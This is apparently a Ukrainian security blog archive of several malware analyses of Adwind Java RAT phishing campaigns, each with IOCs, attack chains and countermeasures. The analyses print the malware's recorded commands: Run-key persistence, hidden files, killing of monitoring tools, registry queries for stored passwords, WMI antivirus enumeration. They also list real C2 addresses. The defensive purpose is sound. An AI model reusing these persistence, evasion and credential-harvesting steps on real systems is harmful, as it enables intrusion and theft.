Tag Archive | JRE

IOC_Adwind_100518

Доброго вечора, панове.

Вчора була зафіксована розсилка шкідливого коду типу #Adwind (RAT).

Ми вже кілька разів розбирали його різні варіації.

#Adwind застосовується для збору інформації та віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі використовують JRE та альтернативні поштові клієнти* чи WebMail, – високий.

А для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Сервер розсилки імітує домен Інституту зварювання ім. Патона
  • (!) актуальні версії MS Outlook по замовчуванню блокують доступ до приєднань цього типу
  • #Adwind не створює нових запускних файлів крім копії модулів JRE
  • Активно використовує WSH та WMI
  • Не потребує прав Адміністратора
  • Може бути каналом доставки іншого malware
  • Цього разу Jar без обгортки

Схема атаки:

email > Attach (jar) > javaw.exe > java.exe > cscript.exe> WMIC.exe > data exfiltration

Маркери IOC:

Основна частина:

SHA-256        8dd7c604013ca7bdabba34ab04291a85ffb9846063de0efb17f8bf2d0a7e04e8
File name   uba.qrypted.jar (18ZJ127 INV (2).jar)
File size      769.07 KB

Мережеві IOC:

Трафік інфікованої системи:

java.exe    1284 TCP   127.0.0.1   49794        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  840   TCP   10.0.2.15   49754        185.227.83.51   5030 ESTABLISHED      

 

java.exe    1284 TCP   APM11       49796        localhost    7777 SYN_SENT                                                                         
javaw.exe  840   TCP   apm11       49754        51.83.227.185.gerber.non-logging.vpn       5030 ESTABLISHED

Активність по процесам:

Коли жертва відкриває JAR файл, відбувається обробка інструкцій і закріплення бекдору:

"C:\Program Files (x86)\Microsoft Office\Office12\OUTLOOK.EXE" /f "C:\Users\operator\Desktop\RE New Order # 014563.msg"
"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\tmp\Temporary Internet Files\Content.Outlook\RBXHTDD1\18ZJ127 INV (2).jar"
"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.96591224716123398063543837287709600.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1028621641851654372.vbs
cscript.exe  C:\tmp\Retrive1028621641851654372.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1863584818779134903.vbs
cscript.exe  C:\tmp\Retrive1863584818779134903.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e
"cmd.exe" /C cscript.exe C:\tmp\Retrive7838850603346017630.vbs
cscript.exe  C:\tmp\Retrive7838850603346017630.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1695544840638860067.vbs
cscript.exe  C:\tmp\Retrive1695544840638860067.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

Таким чином, файли інтерпретатора Java копіюються із \Program Files у каталог профіля користувача.

Після цього проходить закріплення через HKU\Current Version\Run

(!) Зверніть увагу – до списку автозавантаження додається легітимний процес JRE, шкідливі команди передаються параметром:

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OQZJaDzMiFp /t REG_EXPAND_SZ /d
"\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA\"" /f

Щоб приховати сліди, Adwind змінює атрибути робочого каталогу:

"attrib" +h "C:\Users\operator\DUsCXQFVGan\*.*"
"attrib" +h "C:\Users\operator\DUsCXQFVGan"

Після закріплення розпочинається збір інформації:

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.72519027776652135739829391954449646.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1356326019894555462.vbs
cscript.exe  C:\tmp\Retrive1356326019894555462.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive4827650205509862735.vbs
cscript.exe  C:\tmp\Retrive4827650205509862735.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5797923481866821519.vbs
cscript.exe  C:\tmp\Retrive5797923481866821519.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5311907378487770237.vbs
cscript.exe  C:\tmp\Retrive5311907378487770237.vbs
"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Видалення JRE там, де він не є необхідним по роботі
  • Заборона створення/запису .jar файлів у каталозі користувача
  • Блокування доставки файлів типу JAR на рівні Web та Email шлюзів
  • Заборона створення/зчитування vbs файлів або ж повна деактивація механізму WSH
  • Заборонити процесу javaw зчитувати файли з каталогу користувача
  • Суворий контроль переліку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\ – дозволить упередити копіювання файлів JRE
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_070218

Доброго вечора, панове.

Сьогодні зранку зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Ми з ним уже “знайомі”: розибрав у червні 16го, у травні 17го, на початку вересня 17го та 12го жовтня.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Цього разу примітивно, без обгортки, просто JAR у приєднанні.

Рейтинг приманки на VT jar – 9/60.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схема атаки:

email > .JAR > %temp%\*.JAR, *.class & *.vbs > %Userprofile%\EALtjyLyxBW\

Маркери IOC:

File name   SKMBT_C02072018.jar
SHA-256        abd38eea774ca43a7df3d4e173b07fcee809e2bb0d9ae6d8fd7021610938e7ce
File size      534.01 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\decoded.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

 

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.92849276228029881768736636918737462.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive8012862021299542926.vbs
cscript.exe  C:\tmp\Retrive8012862021299542926.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

 

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

 

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NjLVawaQVWM /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx\"" /f
=
NjLVawaQVWM   Java(TM) Platform SE binary  Oracle Corporation        c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  21.06.2013 22:05               

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\EALtjyLyxBW\*.*"
"attrib" +h "C:\Users\operator\EALtjyLyxBW"

– приховує свої файли через атрибути файлової системи

 

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.482691304425191373098301473738213403.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive5796149169918309765.vbs
cscript.exe  C:\tmp\Retrive5796149169918309765.vbs

– передача керування на файл з інструкціями з каталогу користувача

 

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""AV"":""" & .displayName & """}"
 End With
Next

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
 End With
Next
 

– збір інформації про

  • встановленні драйвери PnP пристроїв
  • антивірусне ПЗ
  • брандмауер

(!) може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю.

Мережеві IOC:

Мережева активність при інфікуванні – спроба з’єднатися із вузлом в TOR

DNS  102   Standard query response 0xe7ab A vvrhhhnaijyj6s2m[.]onion[.]top A 62.0.58.94

Трафік скомпрометованої системи:

java.exe    2208 TCP   127.0.0.1   49359        127.0.0.1   7777 SYN_SENT                                                                         
java.exe    1592 TCP   127.0.0.1   49362        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  1464 TCP   10.0.2.15   49291        185.158.139.39 5017 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_121017

Доброго вечора, панове.

Вчора в першій половині дня було зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Він уже потрапляв в поле мого зору тричі: у червні 16го, у травні 17го та на початку вересня 17го.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Рейтинг приманки на VT – досі! docx 3/60, jar – 4/60.

Цього разу для обходу фільтрів застосували обгортку у вигляді OLE об’єкту у .docx файлі.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI.

Трохи аналітики:

Я завжди виділяв даний клас загроз з поміж усіх зразків, які мені доводилося розбирати.

Причина полягає в тому, що 90% того мотлоху який щоденно тоннами розсилається у мережі не залежно від типу та форми обгортки (dropper) зводиться до примітивного – “завантажити / розпакувати / запустити .exe” (payload)

Відповідно, ті, хто звертають увагу не лише на IOC, а й на мої рекомендації, вже знають, що більшість складних/хитрих схем інфікування можна поламати через правила Acces Protection або деактивацію відповідних механізмів ОС, що дозволяє зупинити активність зразків на початковій стадії, не допускаючи значних ушкоджень системи жертви. (тут мова про сигнатури взагалі не йде бо в момент розсилки їх просто не буде)

Коли ми говоримо про Adwind потрібно вживати додаткових заходів захисту адже зразки цього типу в процесі інфікування не створюють нових запусних файлів, вони використовують встановлену JRE з дійсним цифровим підписом на яку через параметр подаються команди із файлу. Після закріплення уся активність на яку може звернути увагу технічний спеціаліст це присутність процесу javaw.exe (який досить легко сплутати з оновленнями Java) у автозавантаженні та періодична мережева активність від імені цього ж процесу – погодьтеся, що це не  буде виглядати підозрілим для системи, на якій активно використовуються Java додатки.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

 

Схема атаки:

email > .docх > OLE > %temp%\Java Update.jar, *.class & *.vbs > %Userprofile%\feAvqJOQQQh\vopqWIOLoxI.ZrKgLV

Маркери IOC:

File name Purchase Order & Product Specification.doc
SHA-256 2391153b1d1cce5645545e2e7f08361e4dbe44332f6d1730da2c2a9fa6086faa 
File Type application/vnd.openxmlformats-officedocument.wordprocessingml.document
File size 605.71 KB

File name Java Update.jar
SHA-256 b1cec81040e0d2408bfa1fc949899a6b99cc44e9aafe80fdf1d2bebd4e3f5a1d 
File Type application/x-java-archive; charset=binary
File size 542.64 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\tmp\Java Update.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.5743056579312063127883038705222330.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive570114789299081000.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

це те, що має насторожити уважного адміна/ІБшника (про скрипти в %temp% я вже мовчу)

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v FwdqdYRuBhF /t REG_EXPAND_SZ /d 
"\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\feAvqJOQQQh\vopqWIOLoxI.ZrKgLV\"" /f

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\feAvqJOQQQh\*.*"

– приховує свої файли через атрибути файлової системи

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\feAvqJOQQQh\vopqWIOLoxI.ZrKgLV

– передача керування на файл з інструкціями з каталогу користувача

"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.147022225971277562635083797810489821.class 
%temp%\vaTFpntHCB8289512746733850272.reg
"cmd.exe" /c regedit.exe /s C:\tmp\vaTFpntHCB8289512746733850272.reg

– запуск скриптів ініціює часткову зачистку слідів, відкриття мережевих з’єднань і блокування системних та засобів захисту через Image File Execution Options, “debugger”

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

– збір інформації про встановленні драйвери PnP пристроїв – може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

на відміну від зразка за 16й рік, який цікавився не драйверами а параметрами брандмауєра

"taskkill" /IM UserAccountControlSettings.exe /T /F 
"taskkill" /IM Taskmgr.exe /T /F
"taskkill" /IM procexp.exe /T /F
"taskkill" /IM wireshark.exe /T /F

– спроба зупинити роботу довжелезного переліку засобів безпеки та утиліт моніторингу

reg  query "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676" 
reg  query "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
reg  query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
reg  query "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"
reg  query "HKEY_CURRENT_USER\Software\HeidiSQL\Servers"
reg  query "HKEY_CURRENT_USER\Software\DownloadManager\Passwords"
reg  query "HKEY_CURRENT_USER\Software\Paltalk"
reg  query "HKEY_CURRENT_USER\Software\Beyluxe Messenger"
reg  query "HKEY_CURRENT_USER\Software\IMVU\username"
reg  query "HKEY_CURRENT_USER\Software\IMVU\password"

– перевірка цікавих ключів реєстру

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю:

victim_host:49309 > 5.133.15.1:1434 TCP

###

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Мережеві IOC:

victim_host:49309 > 5.133.15.1:1434 TCP

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_050917

Доброго дня, панове.

Вчора в першій половині дня було зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Він уже потрапляв в поле мого зору двічі: у червні 16го та у травні 17го.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI:

Трохи аналітики:

Я завжди виділяв даний клас загроз з поміж усіх зразків, які мені доводилося розбирати.

Причина полягає в тому, що 90% того мотлоху який щоденно тоннами розсилається у мережі не залежно від типу та форми обгортки (dropper) зводиться до примітивного – “завантажити / розпакувати / запустити .exe” (payload)

Відповідно, ті, хто звертають увагу не лише на IOC, а й на мої рекомендації, вже знають, що більшість складних/хитрих схем інфікування можна поламати через правила Acces Protection або деактивацію відповідних механізмів ОС, що дозволяє зупинити активність зразків на початковій стадії, не допускаючи значних ушкоджень системи жертви. (тут мова про сигнатури взагалі не йде бо в момент розсилки їх просто не буде)

Коли ми говоримо про Adwind потрібно вживати додаткових заходів захисту адже зразки цього типу в процесі інфікування не створюють нових запусних файлів, вони використовують встановлену JRE з дійсним цифровим підписом на яку через параметр подаються команди із файлу. Після закріплення уся активність на яку може звернути увагу технічний спеціаліст це присутність процесу javaw.exe (який досить легко сплутати з оновленнями Java) у автозавантаженні та періодична мережева активність від імені цього ж процесу – погодьтеся, що це не  буде виглядати підозрілим для системи, на якій активно використовуються Java додатки.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схему атаки, маркери та перелік контрзаходів дивіться нижче.

Як і завжди основний принцип залишається незмінним – “Простіше упередити інфікування на ранній стадії аніж потім розбиратися із наслідками перебування шкідливого коду

Схема атаки:

email > attach (ZIP) > JAR > %temp%\*.class & *.vbs > %Userprofile%\Windows.reg\Update.scan

Маркери, IOC:

File Name PO-7235.jar
SHA-256 Hash Identifier 70ECF5D3EC5C876901BE635484E0137A31167143C9758DB52C54294810B27C14
File Size 558587 bytes
File Type application/x-java-archive; charset=binary

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\PO-7235.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.94455666565898946497103256142168062.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive6049223750802148355.vbs
cscript.exe  C:\tmp\Retrive6049223750802148355.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive7219502531594942910.vbs
cscript.exe  C:\tmp\Retrive7219502531594942910.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%, це те, що має насторожити уважного адміна/ІБшника (про скрипти в %temp% я вже мовчу)

"cmd.exe" /C cscript.exe C:\tmp\Retrive5392694676028337177.vbs
cscript.exe  C:\tmp\Retrive5392694676028337177.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive7999422219165629138.vbs
cscript.exe  C:\tmp\Retrive7999422219165629138.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– – повторне копіювання, можливо для перестороги

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v javaw.exe /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\Windows.reg\Update.scan\"" /f

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\Windows.reg\*.*"
"attrib" +h "C:\Users\operator\Windows.reg"

– приховує свої файли через атрибути файлової системи

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\Windows.reg\Update.scan

– передача керування на файл з інструкціями з каталогу користувача

"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.89960564281661135816979970325922234.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1106571663555988847.vbs
cscript.exe  C:\tmp\Retrive1106571663555988847.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive4075909662068347616.vbs
cscript.exe  C:\tmp\Retrive4075909662068347616.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive810479841220532242.vbs
cscript.exe  C:\tmp\Retrive810479841220532242.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1722342620952052502.vbs
cscript.exe  C:\tmp\Retrive1722342620952052502.vbs

– запуск скриптів ініціює часткову зачистку слідів, відкриття мережевих з’єднань

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

– збір інформації про встановленні драйвери PnP пристроїв – може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої) на відміну від зразка за 16й рік, який цікавився не драйверами а параметрами брандмауєра

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю:

176.10.124.239 TCP 49189 → 8073 [PSH, ACK]

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Зразки правил ENS AP:

ENS \ Threat Protection \ Access Protection > Add

Description: anti_Adwind_VR

Action: +Block +Report

Executables: All (*.exe)

Subrules:

rule1 
BLK_appdata_exe block 
+Create +Execute 
**\Users\*\**\*.exe

rule2 
BLK_appdata_script_ 
+Write +Create +Execute +Read
**\Users\*\**\*.vbs
**\Users\*\**\*.js*
**\Users\*\**\*.wsf
**\Users\*\**\*.jar

Результат дії правил:

Як бачите, навіть при частковій забороні лише .vbs файлів зразок не додає себе в автозавантаження і зєднання із сервером контролю не проходить (так, файли залишаються і процеси активні, проте інформації про систему він вже не передає і перезавантаження не переживе – якщо тільки жертва не активує його сама повторно)

Мережеві IOC:

176.10.124.239 TCP 49189 → 8073 [PSH, ACK]

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_java_bkdr_220517

 

Візьміть до уваги!

Вчора (22го травня) була зафіксована розсилка вірусного коду у вигляді java додатку.
Це різновид Adwind – багатокомпонентний backdoor на java.
Я такий раніше вже аналізував – ось запис https://radetskiy.wordpress.com/2016/06/09/jar_backdoor/

Небезпека полягає в наступному:

Цей зразок шкідливого коду не створює і не завантажує нові .exe файли.
Він працює через довірені процеси Java інтерпритатора.
Від так при поверхневому аналізі системи його завантаження матиме дійсний цифровій підпис процесу Java RE.

Маркери (IOC):
– – – – – – – – – – – – –

#1 email Received: from VPS2DAY-3P5MJ0J.vps2day.com (unknown [37.10.71.236])
– орендувався на період розсилки, зараз недоступний

#2 dropper документ MS Word
File Name Compliance_file_0002.doc
MD5 Hash Identifier 7B1012F6F04D3202F272DD6CF107C998
SHA-1 Hash Identifier 42B012F62A589F3D28103DDA7B9E9C9BF453735D
SHA-256 Hash Identifier 9F083BAD91B524FABF90B1D96B11DC20A66A1DEBE172827220B658B358FC5476
File Size 603503 bytes
File Type application/vnd.openxmlformats-officedocument.wordprocessingml.document

після активації видобуває із себе .jar модуль і закріплюється в системі через автозавантаження:

c:\program files\java\jre7\bin\javaw.exe
“c:\program files\java\jre7\bin\javaw.exe” -jar “c:\users\admini~1\appdata\local\temp\sund265.jar

Registry Modified Key NewValue Type
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\bHsjjcvqZYM
“C:\Users\Administrator\AppData\Roaming\Oracle\bin\javaw.exe
-jar “C:\Users\Administrator\bESDTWqKmAn\AslueHMJTIP.PVJdkt” REG_EXPAND_SZ

#3 payload Jar файл, який виконується JRE

File Name SunD265.jar
MD5 Hash Identifier 48B3A3E436D98B660B6455CA01FCFAAF
SHA-1 Hash Identifier 271D72F4E0E7759A44C488417A110F05D494C60C
SHA-256 Hash Identifier F83201512E3433DABDC6E70AF6E2BD52B9F90A68C1AD022E6E5D89312DC7CD66
File Size 605894 bytes
File Type application/x-java-archive; charset=binary

запуск компонентів:

“c:\program files\java\jre7\bin\java.exe”
-jar c:\users\admini~1\appdata\local\temp\_0.60815154253218772229614256043455032.class
“cmd.exe” /c cscript.exe c:\users\admini~1\appdata\local\temp\retrive1490150423318292422.vbs
“cmd.exe” /c cscript.exe c:\users\admini~1\appdata\local\temp\retrive7919106372540064215.vbs
“cmd.exe” /c cscript.exe c:\users\admini~1\appdata\local\temp\retrive8237390097791835769.vbs
“cmd.exe” /c cscript.exe c:\users\admini~1\appdata\local\temp\retrive8949023460065588193.vbs
“xcopy” “c:\program files\java\jre7” “c:\users\administrator\appdata\roaming\oracle\” /e

відкриває з’єднання із серверами:
137.74.103.16:9090″
80.231.241.66:80″

#4 dll
File Name Windows7111878064044653248.dll
MD5 Hash Identifier 0B7B52302C8C5DF59D960DD97E3ABDAF
SHA-1 Hash Identifier D85524F464DCDED54EDFCFE6A5056F6C4008BBCB
SHA-256 Hash Identifier A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
File Size 46592 bytes

Obtained the identifier of the thread or process that created the specified window
Obtained the priority value for a thread
Set the priority value for a thread

#5 vbs Retrive6039876219097447900.vbs, Retrive867820139510199033.vbs, Retrive867820139510199033.vbs

File Name Retrive6039876219097447900.vbs
MD5 Hash Identifier 3BDFD33017806B85949B6FAA7D4B98E4
SHA-1 Hash Identifier F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
